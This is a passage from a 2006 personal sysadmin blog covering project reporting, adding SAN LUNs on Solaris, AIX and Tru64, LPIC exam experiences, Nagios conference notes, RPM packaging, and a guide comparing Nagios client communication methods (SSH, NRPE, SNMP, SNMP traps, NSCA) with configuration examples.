One of the biggest mistakes I've made in my recent past was to assume that my customer was reading every document I'd been giving them. I'd been sending them e-mails about show stoppers and I'd been providing them with those beautiful reports I've been telling you about. But still something went horribly wrong. You see, some managers really don't care about technical background and thus they'll ignore certain parts of your reports. They figure that, since you're not coming to talk to them, everything's hunky-dory.

This is exactly why e-mail and big documents are no substitute for good, old face to face contact.

Make sure that you have regular conversations with your client about your progress and any problems that you've run into. You could even go the extra mile and request a regular, bi-weekly meeting! Talking to the customer in person will give you the chance to make sure they know exactly what's going on and that they fully understand everything you've written in your interim report.

Everything comes to an end

"You can spend the rest of your life with me...but I can't spend the rest of mine with you. I have to live on. Alone. That's the curse of the Time Lords."

From 2005's season of 'Doctor Who'

Like all masterpieces your enterprise needs a grand finale!

Now that all the work has been done and your goals have been reached you will need to transfer responsibility for everything that you've made. Cross the Ts and dot the Is and all that. In short, you'll be writing an expanded version of the interim report.

The composition of your document should include the following topics:

On the last page of your document, leave room for notes and signatures from your client and their lead technicians. Go over the document with everyone that'll need to take responsibility for your project. When they agree with everything you've written, have them sign that page. You will end up with a page that contains all the autographs that you'll need.

Task review

Solaris automated installation server



[...]



Current status:

Finished per December of 2005. Unfortunately there are a few small flaws still left in the standard build. These have been documented and will be fixed by $CLIENT.

Project recommendations

A basic list of applications to be entered into phase 2 was delivered a few weeks ago. Now we will need to ascertain all the items that should be monitored on a per-application basis.



Once those requirements have been decided on we can continue with the implementation. This includes expanding the existing Nagios configuration, expanding the Nagios client packages and possibly the writing of additional plugins.

Resource expenditure

A graph detailing how I spent my time

Risks and pitfalls

These are areas identified by Thomas as risk areas that need addressing by the $CLIENT team:



1. Limited knowledge of Nagios's implementation of SNMP.

2. Limited knowledge of Perl and Shell scripting in lab team.

3. Limited knowledge of SDS/SVM volume management in lab team.

4. Limited knowledge of Solaris systems management.

5. Only 1 engineer in lab team able to support all aspects of Unix.

Checklists

An example of a checklist.

In conclusion

I've found that many of my customers were pleasantly surprised to receive detailed project reports. It really is something they're not used to from their IT crowd. So go on and surprise your management! Keep them informed, strengthen your bond with them and at the end of the day take in the compliments for a job well done.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Why ZFS matters to the rest of us

2006-12-22 22:41:00

Thanks to a link on the MacFreak fora I stumbled onto a great blog post explaining why ZFS is actually a big deal. The article approaches ZFS from the normal user's angle and actually did a good job explaining to me why I should care about ZFS.

Real nice stuff and I'm greatly looking forward to Mac OS X.5 which includes ZFS.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

As promised: adding a new LUN to Tru64

2006-12-22 09:00:00

As I promised a few days ago, here's the quick description of how to add a new LUN to a Tru64 box. Contrary to what I told you earlier, I thought I'd put it in a separate blog post. No need to edit the original one, since it's right below this one.

Adding a new LUN to a Tru64 box with TruCluster

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

hwmgr -scan scsi

3. Label the "disk".

disklabel -rw $DISK

4. Add the disk to a file domain (volume group).

mkfdmn $DISK $DOMAIN

5. Create a file set (logical volume).

mkfset $DOMAIN $FILESET

6. Create a file system.

Not required on Tru64. Done by the mkfset command.

7. Test mount.

Mount.

8. Add to fstab.

vi /etc/fstab

Also, if you want to make the new file system fail over with your clustered application, add the appropriate cfsmgr command to the stop/start script in /var/cluster/caa/bin.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Crash course in new OSes

2006-12-20 20:20:00

The past two weeks I've been learning new stuff at a very rapid pace, because my client uses only a few Solaris boxen and has no Linux whatsoever. So now I need to give myself a crash course in both AIX and Tru64 to do stuff that I used to do in a snap.

For example, there's adding a new SAN device to a box, so it can use it for a new file system. Luckily most of the steps that you need to take are the same on each platform. It's just that you need to use different commands and terms and that you can skip certain steps. The lists below show the instructions for creating a simple volume (no mirroring, striping, RAID tricks, whatever) on all three platforms.

Adding a new LUN to a Solaris box with SDS

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

devfsadm -C disks

3. Label the "disk".

format -> confirm label request

When using Solaris Volume Manager

4. Add the disk to the volume manager.

metainit -f $META 1 1 $DISK

5. Create a logical volume.

metainit $META -p $SOFTPART $SIZE

6. Create a filesystem

newfs /dev/md/rdsk/$META

7. Test mount.

mount $MOUNT

8. Add to fstab.

vi /etc/vfstab

When using Veritas Volume Manager

4. Let Veritas find the new disk.

vxdctl enable

5. Initialize the disk for VXVM usage and add it to a disk group.

vxdiskadm -> initialize

6. Create a new volume in the diskgroup.

Use the vxassist command.

7. Create a file system.

newfs /dev/vx/rdsk/$VOLUME

8. Test mount

mount $MOUNT

9. Add to vfstab

vi /etc/vfstab

Adding a new LUN to an AIX box with LVM

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

cfgmgr

3. Label the "disk".

Not required on AIX.

4. Add the disk to a volume group.

mkvg -y $VOLGRP -s 64 -S $DISK

5. Create a logical volume.

mklv -y $VOLNAME -t jfs2 -c1 $VOLGRP $SIZE

6. Create a filesystem

crfs -v jfs2 -d '$VOLNAME' -m '$MOUNT' -p 'rw' -a agblksize='4096' -a logname='INLINE'

7. Test mount

mount $MOUNT

8. Add to fstab.

vi /etc/filesystems

Adding a new LUN to a Tru64 box running TruCluster

I'll edit this post to add these instructions tomorrow, or on Friday. I still need to try them out on a live box ;)

Anywho. It's all pretty damn interesting and it's a blast having to almost instantly know stuff that's completely new to me. An absolute challenge! It's also given me a bunch of eye openers!

For example I've always thought it natural that, in order to make a file system switch between nodes in your cluster, you'd have to jump through a bunch of hoops to make it happen. Well, not so with TruCluster! Here, you add the LUN, go through the hoops described above and that's it! The OS automagically takes care of the rest. That took my brain a few minutes to process ^_^


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Got my LPIC-101

2006-12-14 11:37:00

This morning I went to my local Prometric testing center for my LPI 101 exam (part one of two, for the LPIC-1). Beforehand I knew I wasn't perfectly prepared, since I'd skipped trial exams and hadn't studied that hard, so I was a little anxious. Only a little though, since I usually test quite well.

Anywho: out of a maximum of 890 points I got 660, with 500 points being the minimum passing grade. Read item 2.15 on this page to learn more about the weird scoring method used by the LPI. It boils down to this: out of 70 questions I got 61 correct, with a minimum of 42 to pass. If we'd use the scoring method Sun uses, I'd have gotten an 87%. Not too bad, I'd say!

I did run into two things that I was completely unprepared for. I'd like to mention them here, so you won't run into the same problem.

1. All the time, while preparing, I was told that I'd have to choose a specialization for my exam: either RPM or DPKG. Since I know more about RPM I had decided to solely focus on that subject. But lo and behold! Apparently LPI has _very_ recently changed their requisites for the LPIC-1 exams and now they cover _both_ package managers! D:

2. In total I've answered 98 questions, instead of the 70 that was advertised. LPI mentions on their website (item 2.13) that these are test-questions, considered for inclusion in future exams. These questions are not marked as such and they do not count towards your scoring. It would've been nice if there had been some kind of screen or message warning me about this _at_the_test_site_.

Anywho... I made it and now I'm on to the next step: LPIC-102.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPIC-101 Summary

2006-12-12 22:38:00

Version 1.0 of my LPIC-101 study notes is available. I bashed it together using the two books mentioned below. A word of caution though: this summary was made with my previous knowledge of Solaris and Linux in mind. This means that I'm skipping over a shitload of stuff that might still be interesting to others. Please only use my summary as something extra when studying for your own exam.

I'm up for my exam next Thursday, at ten in the morning. =_=;

Oh yeah... The books:

Ross Brunson - "Exam cram 2: LPIC 1", 0-7897-3127-4

Roderick W. Smith - "LPIC 1 study guide", 978-0-7821-4425-3


kilala.nl tags: , , , , , ,

View or add comments (curr. 0)

NLOSUG meeting

2006-10-25 23:38:00

Phew! That was a long night! I'm not used to staying up this late on weekdays =_=

I went to the first NLOSUG meeting tonight, like I said I would a few days ago. Aside from finally learning a little bit about Open Solaris (although most of it was basic community stuff) and some more in-depth stuff on ZFS, it was also very cool to meet some old acquaintances. There was a bunch of folks from Sun whom I hadn't seen in a long time, as well as Martijn and Job with whom I'd worked as colleagues a long time ago. Shiny :)

So the eve' was mostly for fun, with a little education thrown in. Well worth the hours I put in...


kilala.nl tags: , ,

View or add comments (curr. 3)

Using BSD hardware sensors with SNMP.

2006-10-25 09:05:00

Many thanks to my colleague Guldan who pointed me towards a website giving a short description of using the BSD hardware-sensors daemon, together with Nagios in order to monitor your hardware. Using sensord should make things a lot easier for people running BSD, as they won't have to muck about with SNMP OIDs and so on.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Open Solaris Users Group

2006-10-20 13:13:00

Sun has made arrangements for the inaugural meeting of the Dutch Open Solaris Users Group. The meeting will be held on the evening of Thursday the 26th, at their office in Amersfoort.

Aside from the stuff you'd expect (like a few lectures on new Solaris features) you could also say it'll be a fun evening :) Meet some new people, have some food'n'drinks all mixed in with some interesting work-related stuff.

I'm game :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Two days of training

2006-10-17 19:38:00

Monday and Tuesday were not spent with the usual Nagios project in Amersfoort. Instead, I spent two days cooped up in a small hotel, somewhere in the Achterhoek (for my foreign visitors: one of the Netherlands' rural, backwater areas). It was time well spent, on an inter-personal communications course from CCCM.

While I was originally quite sceptical, the course turned out fine. About halfway through Monday things took a turn that made me decide that their approach might not fit my preferences, but half an hour later I also decided that _sticking_ with the course would help me in achieving one of my goals: learning to play my cards close to my chest and not letting a group of people in on my emotions regarding a subject. So even though the course may not be 100% up my alley, I may as well take the time to get some practice in :)

Anywho... November and January will see two additional training days, with a few personal talks at the CCCM office thrown in as well.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Great minds think alike

2006-10-03 23:31:00

This goes to show that the proverb above is right: Joerg Linge, whom I met at NagKon 2006, just e-mailed me. He mentioned that right around the same time we had both come up with a similar solution to one problem.

The problem: use Nagios plugins through a normal SNMP daemon.

Our solutions were identical when it came to configuring the daemon, but differed slightly when it comes to getting the information from the client. The approach is the same, but while he uses Perl for the plugin, I use Bash ^_^

Life's little coincidences :)

Joerg's solution and write-up.

My solution and write-up.

Anywho... Joerg's a cool guy :) Go check out his website and have a look around.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios Conference, aftermath

2006-09-24 09:04:00

So I made it back home in one piece. My trip back took me around 7.5 hours, which was mostly due to me driving a little bit faster :p

I have to say that the A45 route up north is much less glamorous than the A3 :( The Rasthöfe (motorway rest stops) all look much older and less fancy than the ones on the A3. Ah, but they sufficed anyway...

I'm thinking of moving my summaries from the previous blog posts into one big page in the Sysadmin section. Reckon that should prevent Google from raising the Archives above the Sysadmin section when it comes to Nagios.

/me starts immediately.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Nagios Conference, day 2

2006-09-22 23:27:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 17:10:00

Astounding, by the way, the number of Apple laptops I see around here. Less than at SANE'06, but still, around 35%. o/


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 1

2006-09-21 17:01:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 14:19:00

For the conference I had Snow buy me the iMic and a nice Philips microphone. For now though, I'm not completely happy with the setup.

* The mic is omnidirectional and thus doesn't pick up much of what the person out in front is saying, while it does pick up quite a lot of noise from the room.

* iMic is a USB device and it seems that it claims enough CPU resources to mess with the rest of my system :(

Lunch was nice though! <3


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 0

2006-09-20 23:21:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 2)

Off to Germania I go!

2006-09-19 21:13:00

The next few days I'll be in Germania... Nurnberg, to be precise.

Together with around eighty other Nagios administrators and experts I'll be attending the first, annual Nagios Conference. Over the course of two days, we'll get a chance to meet up together, exchange ideas and generally have a go at improving both Nagios and our knowledge of the software. I'm looking forward to it quite a lot.

Maybe I'll even meet up with a few of the mailing list members :) I'll bring the camera and I'll try to snap a few quick pics.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Learn something new every day

2006-09-14 21:18:00

Creating my own, custom icon set for Mac OS X will be quite a large job, I've learned so far :)

Basically what it boils down to, is that you:

* Create a nice icon using something like Gimp or Paintshop.

* Create an icon template using IconoGrapher.

* Size your icon down to 128x128, 48x48, 32x32 and 16x16. These four images will be used in Iconographer.

* Each "size" also requires that the mask you need is of the appropriate size.

* All of this rolled together makes a "new style" OS X icon, that can be used all through the OS.

Shit loads of work, but very interesting!

Here are the first six I've created so far. What you cannot see in this image (due to the lack of Alpha stuff), is that each icon has nice rounded corners.

From left to right: Chicken of the VNC, Adium, Adium offline, Adium away, Adium idle, Adium alert. The five Adium icons are bundled into an icon package that can be installed in Adium. The first Adium icon is used in the IconoGrapher template.


kilala.nl tags: , ,

View or add comments (curr. 4)

Dependency hell

2006-08-23 14:37:00

Damn! I'm really starting to hate Dependency Hell. Installing a few Nagios check scripts requires the Perl Net::SNMP module. This in turn requires three other modules. Each of these three modules requires three other modules, three of which require a C compiler on your system (which we naturally don't install on production systems). And neither can we use the port/emerge/apt-get-like Perl tools from CPAN, since (yet again) these are production systems. Augh!


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Building RPM packages

2006-08-10 13:48:00

While working on the $CLIENT-internal package for the Nagios client (net-SNMP + NRPE + Nagios scripts + Dell/HP SNMP agent), I've been learning about compound RPM packages. I.e., packages where you combine multiple source .TGZs into one big RPM package. This requires a little magic when it comes to running the various configure and make scripts. Luckily I've found two great examples.

* SPEC file for TCL, a short SPEC file that builds a package from two source .TGZs.

* SPEC file for MythTV, a -huge- SPEC file that builds multiple packages from multiple source .TGZs, along with a very dynamic set of configure rules.
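The essence of the trick, boiled down to a hypothetical and heavily trimmed SPEC file of my own (package and tarball names are made up): Source0 gets unpacked by the first %setup, and every additional tarball is pulled in with an extra %setup -a invocation.

Name:     nagios-client
Version:  1.0
Release:  1
Summary:  Example of a compound package built from two source tarballs
License:  GPL
Source0:  net-snmp-5.2.1.tar.gz
Source1:  nrpe-2.5.2.tar.gz

%description
Sketch of a compound RPM: two upstream tarballs, one package.

%prep
# unpack Source0 and cd into its directory
%setup -q -n net-snmp-5.2.1
# -T: don't unpack Source0 again, -D: keep the directory, -a 1: unpack Source1 inside it
%setup -q -T -D -a 1 -n net-snmp-5.2.1

%build
# run each component's own configure && make here

%install
# make install DESTDIR=%{buildroot} for each component

%files
/usr/local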


kilala.nl tags: , , , ,

View or add comments (curr. 0)

SANE 2006 conference notes

2006-08-09 07:35:00

After months and months I've uploaded the notes that I took at the various lectures at SANE 2006. They might be useful to -someone- out there. Who knows. Be aware though that portions of the notes are a mishmash of Dutch and English :) The notes can be found as .PDFs in the menu on the left.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Listen up. Here's da plan...

2006-08-08 16:52:00

Because I've got all kinds of things lined up for me to do, I'm going to put them into order. That way both you and I will know what to expect. Here's my priorities:

1. Make the requisite changes to my website, so that it plays nicely with search engines. This shouldn't be more than an evening or two of work (barring any reruns of Doctor Who on BBC3).

2. Study for my two LPIC1 exams.

3. Revive the manga and anime section of the website. This needs regular updates, so I'm going to have to think of a few nice things to add to this. I'm thinking "reviews"... It's also meant to give me a couple of days off between studying for my four exams.

4. Study for my two LPIC2 exams.

5. Move other parts of the website into the mySQL database as well.

6. Improve the PHP code that gets data from the database. It could be much cleaner, safer and more efficient.

7. Build some form of CMS for myself, so I don't have to work in the database manually.

So there you have it boys! The next few months of my life lined out for ya.

Parallel to da plan I will keep on expanding the Sysadmin section with new stuff I discover every week. And I will try to fit in a week or two of vacation somewhere along the line. I have a big bunch of video games that I finally want to finish!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Creating packages

2006-08-08 11:04:00

Recently I've been trying to learn how to build my own packages, both on Solaris and on Linux. I mean, using real packages to install your custom software is a much better approach than simply working with .TGZ files. In the process I've found two great tutorials/books:

* Maximum RPM, originally written as a book by one of Red Hat's employees.

* Creating Solaris packages, a short HOWTO by Mark.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

SNMP = hard work

2006-08-01 17:23:00

Boy lemme tell ya: making a nice SNMP configuration so you can actually monitor something useful takes a lot of work! :) The menu on the left has been gradually expanding with more and more details regarding the monitoring of Solaris (and Sun hardware) through SNMP. Check'em out!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

All work and no play...

2006-08-01 11:49:00

Busybusybusy, that's what I've been. I've been adding all kinds of new stuff to the Sysadmin section, telling you everything you'd like to know about monitoring Solaris and Sun hardware through SNMP.

I don't have much interesting to tell to the non-admin people right now :) Better luck at a later point in time.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios clients for UNIX/Linux

2006-07-27 13:01:00

I've added a small comparison between the various ways in which your Nagios server can communicate with its clients. It's in the menu on the left, or you can go there directly.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Using SNMP with Solaris and Sun hardware

2006-07-26 16:25:00

After digging through Sun's MIB description (see SUN-PLATFORM-MIB.txt) it became clear to me that things are a lot more convoluted than I originally expected. For example, each sensor in the Sun Fire systems leads to at least five objects, each describing another aspect of the sensor (name, value, expected value, unit, and so on). Unfortunately Sun has no (public) description of all possible SNMP sensor objects, so I've come to the following two conclusions:

1. I'll figure it all out myself. For each model that we're using I'll weasel out every possible sensor and all information relevant to these sensors.

2. I'll have to write my own check script for Nagios which deals with all the various permutations of sensor arrays in an appropriate fashion. Joy...

EDIT:

For your reference, Sun has released the following documents that pertain to their SNMP implementation. Mostly they're a slight expansion on the info from the MIB. At least they're much easier on the eyes when reading :p

* 817-2559-13

* 817-6832-10

* 817-6238-10

* 817-3000-10


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Using your Mac OS X system with Vodafone GPRS

2006-07-25 10:42:00

Sweet! I've finally gotten my Nokia cell phone to work as a Bluetooth modem for my GPRS connection.

Vodafone had already sent me a manual describing how to set up the connection, but unfortunately it wasn't working for me. Turns out that Vodafone skipped a few steps. The life saver in this matter turns out to be Ross Barkman's website which has GPRS modem scripts for leading brand cell phones.

If you would like to get your OS X system connected to the Internet through GPRS, do the following:

* Download the appropriate scripts for your phone from Ross' website and install them in "/Library/Modem scripts".

* Add your phone as a BT device (refer to your GSM provider's manual for details).

* Tell OS X to use the phone for a high speed Internet connection (refer to your GSM provider's manual for details).

Up to now I've been working according to Vodafone's manual. These are the changes I had to make (all of them in System Preferences -> Network -> Bluetooth modem)...

PPP tab:

* Instead of "*99#", use "office.vodafone.nl" as your telephone number (depending on your subscription it could also be "web." or "live.").

* Username and password are still "vodafone" and "vodafone".

* Turn off "Send PPP echo packets" and "Use TCP header compression" under PPP Options.

Bluetooth modem tab:

* Instead of "Nokia infra-red", use "Nokia GPRS CID1" as the modem script.

* Turn off "Wait for dialtone".

Now your connection should work. Try dialing in using Internet Connect or the Dial Now button in Network preferences.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Sun-platform-mib.txt

2006-07-25 09:34:00

Right now I'm working on getting my Sun systems properly monitored through SNMP. Using the LM_sensors module for Net-SNMP has gotten me quite far, but there's one drawback. A lot of Sun's internal counters use some really odd values that don't speak for themselves. This makes it necessary to read through Sun's own MIB and correlate the data in there with the stuff from LM_sensors.

Point is, Sun isn't very forthcoming with their MIB even though it should probably be public knowledge. Nowhere on the web can I find a copy of the file. The only way to get it is by extracting it from Sun's free SUNWmasfr package, which I have done: here's SUN-PLATFORM-MIB.txt

In no way am I claiming this file to be a product of mine and it definitely has Sun's copyright on it. I just thought I'd make the file a -little- bit more accessible through the Internet. If Sun objects, I'm sure they'll tell me :3


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Fixes to check_log2 and check_log3

2006-06-19 15:11:00

Both check_log2 and check_log3 have been thoroughly debugged today. Finally. Thanks to both Kyle Tucker and Ali Khan for pointing out the mistakes I'd made. I also finally learned the importance of proper testing tools, so I wrote test_log2 and test_log3 which run the respective check scripts through all the possible states they can encounter.

Oh... check_ram was also -finally- modified to take the WARN and CRIT percentages through the command line. Shame on me for not doing that earlier.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Check_log3 is born

2006-06-01 14:53:00

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". Version 3 of this script gives you the option to add a second query to the monitor. The previous two incarnations of the script only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which will result in a Warning message as well. Goody!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

An introduction to Nagios monitoring

2006-06-01 00:00:00

Working at $CLIENT in 2005 was the first time that I built a complete monitoring infrastructure from the ground up. In order to keep expenses low we went for a free, yet versatile monitoring tool: Nagios.

Nagios, which is available over here, is a free and Open Source monitoring solution based on what was once known as NetSaint.

Nagios allows you to monitor a number of different platforms through the use of plugins which can run on both the server as well as on the monitoring clients. So far I've heard of clients being available for various UNIXen and BSDs (including Mac OS X) and Windows. Windows monitoring requires either the unclear NSClient software, or the NRPE_nt daemon which is basically a port of the UNIX Nagios client.

Setting up the basic server requires some fidgeting with compilers, dependencies and so on. However, a reasonably experienced sysadmin should be able to have the basic software up and running (and configured) in a day. Adding all the monitors for all the clients, though, is another matter entirely.

Although there are a number of GUIs available which should make configuring Nagios a bit easier, I chose to do it all by hand. Just because that's what I'm used to and because I have little faith in GUI-generated config files. You will need to define each monitor separately for each host, so let's take a look at a quick example.

Say that you have twenty servers that need to be monitored by ten monitors each. Each definition in the configuration file takes up approximately sixteen lines, so in the end your config file will be at least 3200 lines long :)
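
For reference, a single definition typically looks something like this sketch (the host name, contact group and time period names are examples); multiply it by the number of hosts and services and you'll see where those thousands of lines come from.

define service{
   host_name                  remote-host
   service_description        D_ROOT
   check_command              check_disk!85!95!/
   max_check_attempts         3
   normal_check_interval      5
   retry_check_interval       1
   check_period               24x7
   notification_interval      120
   notification_period        24x7
   notification_options       w,c,r
   contact_groups             unix-admins
}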

But please don't let that deter you! Nagios is a powerful tool and can help you keep an eye on _a_lot_ of different things in your environment. I for one have become quite smitten with it.

In the menu you will find a configuration manual which I wrote for $CLIENT, as well as a bunch of plugins which were either modified or created for their environment. Quite possibly there are one or two in there that will be interesting for you.


kilala.nl tags: , , ,

View or add comments (curr. 0)

How do Nagios clients communicate?

2006-06-01 00:00:00

I know that, the first time I started using Nagios, I got confused a little when it came to monitoring systems other than the one running Nagios. To shed a little light on the subject for the beginning Nagios user, here's a discussion of the various methods of talking to Nagios clients.

First off, let me make it absolutely clear that, in order to monitor systems other than the one running Nagios, you are indeed going to have to communicate with them in some fashion. Unfortunately very few things in the Sysadmin trade are magical, and Nagios is unfortunately not one of them.

So first off, let's look at the -wrong- way of doing things. When I first started with Nagios (actually I made this mistake on my second day with the software) I wrote something like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk!85!95!/

}

The problem with this setup is that I was using a -local- check and said it belonged to remote-host. Now this may look alright on the status screen ("Hey! It's green!"), but naturally you're not monitoring the right thing ^_^

So how -do- you monitor remote resources? Here's a table comparing various methods. After that I'll give examples on how you can correct the mistake I made above with each method.

PLEASE NOTE: the following discussion will not cover the monitoring of systems other than the various UNIX flavours. Later on I'll write a similar article covering Windows and stuff like Cisco.


A quick comparison

                | SSH            | NRPE           | SNMP              | SNMP traps        | NSCA
Connection      | Srv -> Clnt    | Srv -> Clnt    | Srv -> Clnt       | Clnt -> Srv       | Clnt -> Srv
initiation      |                |                |                   |                   |
Security        | Encryption     | Encryption     | Access List (v2)  | Access List (v2)  | Encryption
                | TCP wrappers   | Access List    | Password (v3)     | Password (v3)     | Access List
                | Key pairs      | TCP wrappers   |                   | TCP wrappers      | TCP wrappers
Configuration   | On server      | On client      | On client         | On client and     | On client
                |                |                |                   | on server         |
Difficulty      | Easy           | Moderate       | Hard              | Hard              | Moderate


SSH

Just about everyone should already have SSH running on their servers (except for those few who are still running telnet or, horror or horrors!, rsh). So it's safe to assume that you can immediately start using this communications method to check your clients. You will need to:

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk_by_ssh!85!95!/

}

Your check command definition would look something like this:

define command {

   command_name check_disk_by_ssh

   command_line /usr/local/nagios/libexec/check_by_ssh -H $HOSTADDRESS$ -C "/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ $ARG3$"

}

Working this way will allow you to do most of your configuring centrally (on the Nagios server), thus saving you a lot of work on each client system. All you have to do over there is make sure that there's a working user account and that all the scripts are in place. Quite convenient... The only drawback being that you're making a relatively open account which has full access to the system (sometimes even with sudo access).
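
In practice, getting check_by_ssh to work boils down to standard SSH housekeeping: the nagios user on the Nagios server needs a passwordless key pair and its public key has to end up in the nagios account's authorized_keys file on every client. A rough sketch, assuming a nagios account exists on both sides and the plugins live in /usr/local/nagios/libexec on the client:

# On the Nagios server, as the nagios user: create a passwordless key pair
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa

# Copy the public key to the nagios account on each client
cat ~/.ssh/id_rsa.pub | ssh nagios@remote-host 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys'

# Verify that check_by_ssh can run a plugin without a password prompt
/usr/local/nagios/libexec/check_by_ssh -H remote-host \
    -C "/usr/local/nagios/libexec/check_disk -w 85 -c 95 /"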



NRPE

As a replacement for the SSH access method, Ethan also wrote the NRPE daemon. Using NRPE requires that you:

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nrpe!check_root

}

And in /usr/local/nagios/etc/nrpe.cfg on the client you would need to include:

command[check_root]=/usr/local/nagios/libexec/check_disk 85 95 /
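
The matching command definition on the Nagios server isn't shown here, but it would look roughly like this (a sketch, assuming check_nrpe was installed into the usual libexec directory):

define command {
   command_name check_nrpe
   command_line /usr/local/nagios/libexec/check_nrpe -H $HOSTADDRESS$ -c $ARG1$
}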

Good thing is that you won't have a semi-open account lying about. Bad things are that, if you want to change the configuration of your client, you're going to have to login. And you're going to have yet another piece of software to keep up to date.



SNMP

Whoo boy! This is something I'm working on right now at $CLIENT and let me tell you: it's hard! At least much harder than I was expecting.

SNMP is a network management protocol used by the more advanced system administrators. Using SNMP you can access just about -any- piece of equipment in your server room to read statistics, alarms and status messages. SNMP is universal, extensible, but it is also quite complicated. Not for the faint of heart.

To make proper use of monitoring through SNMP you'll need to:

The reason why point C tells you to register a private EID is that the SNMP tree has a very rigid structure. Technically speaking you -could- just plonk down your results at a random place in the tree, but it's likely that this will screw up something else at a later time. IANA allows each company to have only one private EID, so first check whether your company already has one on the IANA list.

Unfortunately the check_snmp script that comes with Nagios isn't flexible enough to let you monitor custom SNMP objects in a nice way. This is why I wrote the retrieve_custom_nagios script, which is available from the menu. Your service definition would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command retrieve_custom_snmp!.1.3.6.1.4.1.6886.4.1.4

}

And in this case your snmpd.conf would contain a line like this:

exec .1.3.6.1.4.1.6886.4.1.4 check_d_root /usr/local/nagios/libexec/check_disk -w 85 -c 95 /
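
Before wiring the new OID into Nagios, it's worth checking from the Nagios server whether the exec output actually shows up. A quick sketch, assuming an SNMPv2c community called "public":

# Walk the custom OID to see the output of the check_d_root exec line
snmpwalk -v 2c -c public remote-host .1.3.6.1.4.1.6886.4.1.4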

Up to now things are actually not that different from using NRPE, are they? Well, that's because we haven't even started using all the -real- features of SNMP. Point is that using SNMP you can dig very deeply into your system to retrieve all kinds of useful information. And -that's- where things get complicated because you're going to have to dig up all the object IDs (OIDs) that you're going to need. And in some cases you're going to have to install vendor specific sub-agents that know how to speak to your specific hardware.

One of the best features of SNMP though are the so-called traps. Using traps the SNMP daemon will actively undertake action when something goes wrong in your system. So if for instance your hard disk starts failing, it is possible to have the daemon send out an alert to your Nagios server! Awesome! But naturally this will require a boatload of additional configuration :(

So... SNMP is an awesomely powerful tool, but you're going to have to pay through the nose (in effort) to get it 100% perfect.



SNMP traps

SNMP doesn't involve polling alone. SNMP-enabled devices can also be configured to automatically send status updates to a so-called trap host. The downside to receiving SNMP traps with Nagios is that it takes quite a lot of work to get them into Nagios :D

To make proper use of monitoring through SNMP you'll need to:

There are -many- ways to get the SNMP traps translated for Nagios' purposes, 'cause there's many roads that lead to Rome. Unfortunately none of them are very easy to use.
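
To give you a feel for one of those roads: a common approach is to let snmptrapd hand every incoming trap to a small script, which then injects a passive check result into Nagios through its command file. A very rough sketch; the handler script, the SNMP_TRAPS service and the file locations are all assumptions that you'd adjust to your own setup.

# snmptrapd.conf -- hand every incoming trap to a (hypothetical) shell script
traphandle default /usr/local/nagios/libexec/handle_trap.sh

# /usr/local/nagios/libexec/handle_trap.sh -- crude example handler
#!/bin/bash
# snmptrapd feeds us the trap on stdin: hostname, IP address, then the varbinds.
read host
read ip
varbinds=`cat | tr '\n' ' '`

# Submit a CRITICAL (2) passive result for a (hypothetical) SNMP_TRAPS service.
now=`date +%s`
echo "[$now] PROCESS_SERVICE_CHECK_RESULT;$host;SNMP_TRAPS;2;$varbinds" \
     >> /usr/local/nagios/var/rw/nagios.cmd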



NSCA

And finally there's NSCA. This daemon is usually used by distributed Nagios servers to send their results to the central Nagios server, which gathers them as so-called "passive checks". It is however entirely possible to install NSCA on each of your Nagios clients, which will then get called to send in the results of local checks. In this case you'll need to:

On your Nagios server things would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk!85!95!/

   passive_checks_enable 1

   active_checks_enable 0

}

For the configuration on the client side I recommend that you read up on NSCA. It's a little bit too much to show over here.

The upside to this is that you won't have to run any daemon on your client to accept incoming connections. This allows you to lock down your system quite rigorously.
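
To illustrate, a wrapper script on the client (run from cron or a local scheduler) could push the result of a local check to the central server like this. It's only a sketch: the host name, service name and the send_nsca paths are assumptions.

#!/bin/bash
# Run the local check, then hand the result to the central Nagios server.
output=`/usr/local/nagios/libexec/check_disk -w 85 -c 95 /`
status=$?

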